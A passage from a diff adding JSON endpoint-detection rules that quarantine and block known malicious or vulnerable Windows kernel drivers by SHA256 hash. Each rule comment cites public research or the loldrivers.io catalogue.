"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976267Z", + "creation_date": "2026-03-23T11:45:29.976270Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5381555b-044c-59dc-b7a5-1b9d6f6e78d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976835Z", + "creation_date": "2026-03-23T11:45:29.976838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6b17dce96ba5ae4fbbac4446758dd23ad117864bdb5c4434cb6c157947ec29c1", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53853beb-3e99-5904-8361-2b939bc5f7d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156161Z", + "creation_date": "2026-03-23T11:45:31.156163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156168Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df7b1b37fb9096d864de7e8a1c136b60c92994de9e3b1f3cb51a0427eb730984", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53963025-fdd0-5008-bc46-d37e4cea4802", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476647Z", + "creation_date": "2026-03-23T11:45:30.476650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476659Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ad340c8a4a6e071e15095fd286b600847cd600b7312bd573802f26a73600da7", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "539d7e02-dee4-59dd-ad44-491bd1da746b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817426Z", + "creation_date": "2026-03-23T11:45:31.817428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08ad4c86222f9964418384d93320da01e5779bfd01b0ced82a33696340bca080", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53a0030f-6c03-535f-8076-2f9781d655bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461612Z", + "creation_date": "2026-03-23T11:45:30.461615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461624Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47bcbe0e7087cde7a9fb01fcec12b5ab185112c8f7f5638543715efa774b0cec", + "comment": "Malicious Kernel Driver (aka 5a4fe297c7d42539303137b6d75b150d.sys) [https://www.loldrivers.io/drivers/75b9b0c5-dd3e-4cf3-a693-c80f2feabb6a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53a5fd02-f143-5408-aa1b-d2a45341aef6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612215Z", + "creation_date": "2026-03-23T11:45:29.612217Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a021532f0ac453256526428ccf3518cdba4c6373cc72f340ba208b6c41b3a9e", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53b42dda-f89e-5e56-9331-484c2a69e399", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487540Z", + "creation_date": "2026-03-23T11:45:31.487542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "378cd87cd469810c4933eb81c389bb49ed0df8b0064dfdd4fc69da83a7f95f71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53b75eec-1a13-5d2a-8eb3-375427f39d72", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820380Z", + "creation_date": "2026-03-23T11:45:31.820383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df5ac5e5d60ea0742544507f31c9e5d8fe56191005722d27253b16bf443ff911", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53b81b2e-4e4e-5562-bc85-929b54af481d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482218Z", + "creation_date": "2026-03-23T11:45:31.482222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482263Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "327d978392ef5f9e18c90a38083fde7a58798cb4b83d47c6f991971e8dc50de0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53c1e441-99b0-53c0-9f3a-34a7713a8cde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820807Z", + "creation_date": "2026-03-23T11:45:30.820809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8047859a7a886bcf4e666494bd03a6be9ce18e20dc72df0e5b418d180efef250", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53c3e2af-d0ef-52d4-8d49-aae6b9b980c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604014Z", + "creation_date": "2026-03-23T11:45:29.604016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7cc798804f07ba04cb1ed9233c5852d147b56df612117c54667cf3ebba975de", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53cc438d-274f-51f4-bf9d-ec3cbd5dbadf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478715Z", + "creation_date": "2026-03-23T11:45:31.478719Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478727Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca062e16443d7a58c3bb3c636fb5ba996bfd587b7fe579f0164d9e705b2f94e9", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53d74c83-28a7-56d9-a392-82769a8651a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604626Z", + "creation_date": "2026-03-23T11:45:29.604628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afb9e6b70f707149e7243e41ffafbdda463da9a890c56091c454df60608efa0f", + "comment": "Malicious Kernel Driver (aka daxin_blank3.sys) [https://www.loldrivers.io/drivers/9748d5c8-62dd-474b-a336-0aadb49e5ff9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53d790fb-a44c-50cd-a72e-57526a7e14b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808506Z", + 
"creation_date": "2026-03-23T11:45:31.808510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808518Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97744605f30900e2683e4d350ff13ac9a99d277217a53801afd7075d4f12acbd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53d7e0f5-f489-5f27-9ebe-8f47a88d8bbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616115Z", + "creation_date": "2026-03-23T11:45:29.616117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bda0108de82ebeae82f43108046c5feb6f042e312fa0115475a9e32274fae59", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53fbf268-35fd-5cfc-ad29-7c610baa5971", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808902Z", + "creation_date": "2026-03-23T11:45:31.808904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47945068899bc61f8607d27995c73b3cb7228cded69f9ec96485e0c0f44ea2bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5411539a-0196-5268-841f-ab7ddbef4d51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.818330Z", + "creation_date": "2026-03-23T11:45:30.818332Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f64a78b1294e6837f12f171a663d8831f232b1012fd8bae3c2c6368fbf71219b", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5411c76f-f733-5710-9e82-9a05fc418419", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825940Z", + "creation_date": "2026-03-23T11:45:30.825944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825959Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a1e98520eab5654dbfec4d96d9a2c90c874882f41aae2a38d746e83a11bb96d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "541945b5-60e1-55f6-abeb-ceff7f5c8384", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982982Z", + "creation_date": "2026-03-23T11:45:29.982984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c36ace67f4e25f391e8709776348397e4fd3930e641b32c1b0da398e59199ca7", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5443dc9f-4fde-5fde-9e0c-4d604b2d0d3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154186Z", + "creation_date": "2026-03-23T11:45:31.154188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.154194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e31580793b8b73db0cc688a858522d9827aab9c726c3d06c948d4e4fb53e26a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "544af126-1a38-5af3-91f7-715e19602716", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149507Z", + "creation_date": "2026-03-23T11:45:31.149510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee8a5173f1b5da1bbfe049d646c2c2621ea36163fe4e66f37641562e842ea9dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "545460b2-4376-5b34-a71f-fa28fb7d311c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976939Z", + "creation_date": "2026-03-23T11:45:29.976941Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976954Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "091f6527aa79951fb0b4df269c0ea2247a13053e0d55784e29694381fe4f6fed", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54571b5c-42d1-5b5f-9bdc-b8ead4672067", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489144Z", + "creation_date": "2026-03-23T11:45:31.489146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489151Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77903888069df50a2d881c1cc50c6aea35e47bcee9acf603347eb0ea6c71ad47", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "545b3b9e-b903-59b6-8b96-8d20531dc7a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823063Z", + "creation_date": "2026-03-23T11:45:31.823066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b9a9b525d155296647f4288dcb64c3f5df82dd31f499cdf73abcef531121d0c", + "comment": 